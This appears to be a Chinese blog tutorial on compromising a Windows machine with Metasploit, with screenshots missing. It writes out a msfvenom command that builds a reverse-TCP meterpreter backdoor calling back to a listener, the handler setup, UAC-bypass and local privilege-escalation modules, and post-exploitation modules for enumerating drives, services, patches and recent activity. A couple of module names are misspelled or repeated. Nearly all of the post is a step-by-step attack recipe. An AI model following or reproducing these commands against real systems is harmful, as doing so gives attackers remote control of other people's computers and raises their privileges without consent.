msf windows简单渗透

建立后门

一 建立反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe

二 监听端口建立回话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.1.8

LHOST =>192.168.1.8

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 4444

LPORT => 4444

5 发动攻击

msfexploit(multi/handler) > exploit  # (或者run)

三 目标机器执行shell后门脚本

在这里插入图片描述获得一个普通用户权限

尝试提权失败
在这里插入图片描述权限提升思路:

  1. 提高程序运行级别
  2. Uac绕过
  3. 利用提权漏洞进行绕过

权限提升

exploit/windows/local/ask

在这里插入图片描述执行完后,目标机器就会弹出
在这里插入图片描述
我们就会获得一个新的session
在这里插入图片描述
再次尝试提权就会成功

在这里插入图片描述另一种权限提升思路:
UAC绕过
msf模块:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

我们使用第一个模块:

use exploit/windows/local/bypassuac

设置低权限的session

msf5 exploit(windows/local/bypassuac) > set session 1

开始执行,发现提权成功
在这里插入图片描述

利用提权漏洞进行提权:
exploit/windows/local/ms14_058_track_popup_menu

提权失败,看提示信息这种漏洞只支持32位的操作系统,而目标机器是64位的

在这里插入图片描述利用模块

exploit/windows/local/ms16_016_webdav

该模块同样不支持64位操作系统

在这里插入图片描述

信息收集

msf 模块
获取目标机器的分区情况:

post/windows/gather/forensics/enum_drives

在这里插入图片描述

判断是否为虚拟机:

post/windows/gather/checkvm

在这里插入图片描述

开启了哪些服务:

post/windows/gather/enum_services

在这里插入图片描述

安装了哪些应用:

posst/windows/gather/enum_applications

在这里插入图片描述

查看共享:

post/windows/gather/enum_applications

获得主机最近的系统操作:

post/windows/gather/dumplinks

查看补丁:

post/windows/gather/enum_patches

自动化脚本:

scraper脚本
Winenum脚本

参考文章:
https://blog.csdn.net/u012991692/article/details/80784258

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值